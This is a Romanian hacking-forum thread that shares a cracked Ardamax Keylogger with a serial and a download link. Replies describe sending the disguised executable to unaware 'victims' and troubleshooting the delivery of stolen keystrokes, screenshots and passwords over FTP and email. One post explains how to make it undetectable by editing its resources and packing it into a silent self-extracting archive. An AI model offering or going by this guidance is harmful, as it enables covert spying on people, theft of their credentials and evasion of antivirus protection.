Jump to content
gabyspeed

Ardamax Keylogger v3.7.8 + Serial (licenta merge si nu are virusi)

Recommended Posts

2305d.jpg

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.

Keylogger Features:

* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!

* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.

* Network delivery - sends recorded logs through via LAN.

* Clipboard logging - capture all text copied to the Windows Clipboard.

* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 2000/XP/2003/Vista/Windows 7 Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.

* Visual surveillance - periodically makes screenshots and stores the compressed images to log.

* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:

o AIM

o Windows Live Messenger 2011

o ICQ 7

o Skype 4

o Yahoo Messenger 10

o Google Talk

o Miranda

o QiP 2010

* Security - allows you to protect program settings, Hidden Mode and Log file.

* Application monitoring - keylogger will record the application that was in use that received the keystroke!

* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!

* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.

* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.

* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.

* It records every keystroke. Captures passwords and all other invisible text.

Other Features:

* Windows 2000/2003/XP/Vista/Windows 7 support

* Monitors multi-user machines

* Automatic startup

* Friendly interface

* Easy to install

Download:

New Link

http://www.wupload.com/file/12174145/AKL.rar

Edited by gabyspeed
Link to comment
Share on other sites

Merge...probat si merge...prost sa fii sa nu te duca capul :)

Felicitari echipei de pe RTS ce care aporteaza lucruri noi si bune.

PS : Auzisem ca versiunea free doar 100 loguri iti poate permite , eu am versiune inregistrata , ca iam dat register si am pus datele, si daca ma uit la About : imi pare numele cu care sa inregistrat licenta .

De ce intreb toate astea ?

Pentru ca dupa ce iam schimbat icoana si tot , si lam trimis la victima , si primesc date, dupa vreo 10 pagini ( de logs , imagini ,etc ) sa oprit din a mai trimite.

Si aici vine duda...oare tre sa mai astept ? nush...nas crede.

Si drept dovada , am sters ( in caz ca nu mai trimite pt ca ati bifat casuta cu "Dont send if have doubles logs " ) ...toate logurile care erau pe FTP si am asteptat si tot nimic.

Am trimis iara victimei , la rulat iara , si iar am inceput sa primesc , ciudat nu ?

Vrun maestru ma lamureste oare ce se intampla ?

victima e paralela cu informatica , deci nu stie ea sa scoata , sau sa bage ceva :P

ms

Link to comment
Share on other sites

Merge...probat si merge...prost sa fii sa nu te duca capul :)

Felicitari echipei de pe RTS ce care aporteaza lucruri noi si bune.

PS : Auzisem ca versiunea free doar 100 loguri iti poate permite , eu am versiune inregistrata , ca iam dat register si am pus datele, si daca ma uit la About : imi pare numele cu care sa inregistrat licenta .

De ce intreb toate astea ?

Pentru ca dupa ce iam schimbat icoana si tot , si lam trimis la victima , si primesc date, dupa vreo 10 pagini ( de logs , imagini ,etc ) sa oprit din a mai trimite.

Si aici vine duda...oare tre sa mai astept ? nush...nas crede.

Si drept dovada , am sters ( in caz ca nu mai trimite pt ca ati bifat casuta cu "Dont send if have doubles logs " ) ...toate logurile care erau pe FTP si am asteptat si tot nimic.

Am trimis iara victimei , la rulat iara , si iar am inceput sa primesc , ciudat nu ?

Vrun maestru ma lamureste oare ce se intampla ?

victima e paralela cu informatica , deci nu stie ea sa scoata , sau sa bage ceva :P

ms

Iti voi raspunde cu o intrebare: Cum poti fi logat de doua ori din locuri diferite pe acelasi cont?

Link to comment
Share on other sites

Se presupune ca avand licenta , poti sa te conectezi , fiind o instalare remota , de la tine la X- pc-uri ...nu sa precizat nicaieri ca nu poti fi logat de mai multe ori de unde vrei .

Sau ceva nam inteles , sau tu stii mai multe :)

Hai sa simplificam lucrurile , keyloggerul , til dau tie , apoi il mai dau si lu altul , si il folosesc si eu pentru propriul PC ( sa vad cine ce face la mine , in timp ce sunt la munca) .

clar pana aici?

bun..daca nu as fi avut licenta, sa zicem ca as fi avut probleme , dar uite ca am licenta ,exact cum zicea gabby, si totu merge bine pana la un anumit punct .

:)

EDIT : Uite de exemplu , nu am mai primit nimic de ieri de la ora 23 ..desii victima a stat la calculator pana la 03:00 .

Iar acuma iar e conectatata si nu primesc .

Asta e ciudat , de ce nu se mai primeste dupa X timp ? :)

Edit 2 : poate asta nu se intampla la toti , eu am de exemplu router in casa , si cum de la ISP , am conex cu IP dimanic , mi se schimba la X timp , tiind sa cred ca schimbarea de IP duce la pierderea conexiuni intre FTP -> victima .

Sa presupunem ca lam creat pe X IP ...si primesc , si poate nu mai primesc din momentul in care , routerul schimba IP-ul automat . :)

Solutia...cel putin la mn...ar fi de moment daca stau sa ma gandesc..sa fac cu DynDNS :)

Edited by TryHiddon
Link to comment
Share on other sites

Sryy pt Double post..

am mai gasit o buba la el..

Lam facut de pe alt calculator ..si am trimis victimei.

Am primit , logurile , pe email ( ca asa lam setat ) ..pana in momentul cand am stins acel calculator de unde "facusem" si trimisem .exe-ul victimei.

L-am stins...si mam pus la al meu ,... ghici ce...nu am mai primit nimic :);;)

Ciudat...

In fine...asa e cand cineva se baga mult pe un program , gaseste tot felu de chestii ..

Toate astea le zic...ca poate viitorii oameni care probeaza ..sa aibe si ei habar..sau sa ajungem la un comun acord , si sa ne dam seama de lucrurile ce se intampla.

Nu pt asta e comunitatea? ...eu aportez informatii.

Iar ..precum zicea Nemesis ...cine e informat....e...

bafta si mai astept pareri ^^

LE :

Inca o chestie ciudata , faceti probe :

Am trimis la 2 victime , si am dat sa primesc logurile pe email.

Fata A...caruia iam trimis prima...primeam din minut in minut..pana cand...ma gandisem sa trimit Fetei B...si din momentul ala...am primit numa loguri de la Fata B .

Ciudat nu?

Trebuia sa primesc de la amandoua , din minut in minut ? idei ?

am obs insa..cand a plecat fata B...ca a zis ca pleaca...am inceput sa primesc log-uri de la fata A...wtf ? keylogeru e pe baza de activitate si de ierarhie ?

Chiar mi-ar place sa inteleg...

inca mai fac teste :D

sa vedem si altii ce si cum ^^

Edited by TryHiddon
Link to comment
Share on other sites

Cand il incerc pe mine merge ok, dar daca dau iar pe server nu mai trimite nimic. Daca mai dau inca o data dublu click pe server trimite iar. Daca victima va asculta si a 2-a oara melodia pe care i-o dau se va opri din trimis. Nu prea inteleg asta, o data ce se instaleaza de ce la a 2-a accesare a serverului nu mai functioneaza?

Link to comment
Share on other sites

salut sunt nou pe aici am instalat acest program dar nu reusesc sa ii configurez partea de FTP de conexiune acolo, imi zice cu nu se conecteaza bla bla nu raspunde , deci nu imi merge . astept parerile voastre poate si o adresa de server ceva o poza orice ms(as vrea sa primesc pe mail ceeea ce a spionat programelu). am citit si mai sus ceve legat de router. si eu am router si stau pe wireless sa fie asta problema cu IP dinamic? astept opiniiile voastre. SAU SA FACA CINEVA CARUIA II MERGE UN VIDEO / POZE CU PASII DE INSTALARE CONFIGURARE. MS

Link to comment
Share on other sites

Nu am incercat versiunea aceasta,insa am lucrat ceva vreme cu o versiune anterioara 2.9(foarte stabila) care a trimis fara probleme logurile atit pe FTP cit si pe Mail.Daca vrei sa fie FUD il criptezi.Atunci nu aveam nici un crypter,asa ca am facut altfel,am instalat Ardamax,l-am configurat,fisierele din mapa lui le-am editat cu Restuner,am modificat o parte din resurse,dupa aceasta am pus tot intr-o arhiva SFX.Astfel am obtinut un keylogger hidden,cu instalare silentioasa,gata configurat,si nedetectabil.Rata de detectare obtinuta 0/6.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...